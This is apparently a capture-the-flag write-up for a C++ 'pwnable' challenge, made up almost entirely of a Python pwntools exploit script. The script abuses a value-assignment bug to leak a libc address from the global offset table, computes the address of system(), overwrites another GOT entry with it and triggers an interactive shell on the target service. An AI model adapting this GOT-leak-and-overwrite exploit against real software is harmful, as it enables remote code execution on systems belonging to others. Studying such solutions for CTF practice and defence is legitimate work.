Category : Pwnables
Summary : c++, value assign miss
Exploit
#!/usr/bin/python from pwn import * from struct import pack, unpack def c_set(s, name, sound, feed): s.sendline('4') # set # overflow for leak s.recvuntil('select for set:') s.sendline('1') # animal1 s.recvuntil('name:') s.sendline(name) s.recvuntil('sound:') s.sendline(sound) s.recvuntil('feed:') s.sendline(feed) def c_setname(s, person): s.sendline('6') # set name s.recvuntil('What\'s your name?') s.sendline(person) setvbuf_got = 0x604030 p = lambda x: pack("<Q", x) up = lambda x : unpack("<Q", x)[0] #s = process('./loader') s = remote('0', 7979) s.recvuntil('select:\n') s.sendline('1') # buy s.recvuntil('select:\n') s.sendline('1') # cat s.recvuntil('select:\n') s.sendline('1') # buy s.recvuntil('select:\n') s.sendline('1') # cat c_setname(s, 'a'*8) c_set(s, 'cat', 'meow', 'a'*12+(p(setvbuf_got)[:4])) s.recvuntil('select:\n') s.sendline('5') s.recvuntil('person:') leaked = up(s.recvline()[:-1]) libc_base = leaked - 0x71230 print 'libc base : ', hex(libc_base) system_libc = libc_base + 0x456a0 destring_got = 0x604068 command = 'sh;' c_set(s, 'cat', 'meow', 'a'*12+(p(destring_got)[:7])) c_setname(s, (p(system_libc)[:7])) c_set(s, 'cat', 'meow', 'a'*12+command) s.sendline('2') # sell s.interactive() |